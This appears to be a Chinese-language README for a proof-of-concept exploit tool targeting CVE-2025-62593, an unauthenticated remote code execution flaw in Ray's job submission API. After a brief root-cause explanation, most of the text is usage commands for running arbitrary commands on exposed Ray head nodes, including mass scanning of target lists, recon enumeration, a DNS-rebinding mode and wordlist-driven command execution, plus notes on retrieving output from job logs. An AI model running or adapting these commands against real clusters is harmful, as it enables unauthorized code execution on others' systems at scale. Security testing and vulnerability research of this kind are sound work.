CVE-2025-62593 是 Ray 分布式 AI 计算引擎中的一个未授权远程代码执行漏洞。根本原因在于关键 HTTP 端点(/api/jobs、/api/job_agent/jobs)缺少身份认证。攻击者可以提交一个入口点为任意命令的 Ray Job,并在集群头节点上执行该命令。
# 单个目标
python3 ray_rce_poc.py --target http://HOST:8265
# 批量扫描(10 个并发)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# 侦察模式(快速枚举)
python3 ray_rce_poc.py --recon --targets list.txt
# DNS 重绑定模式
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# 字典扫描
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs//api/jobs/ 直到 Job 达到终止状态/api/jobs/{id}/logs 以恢复输出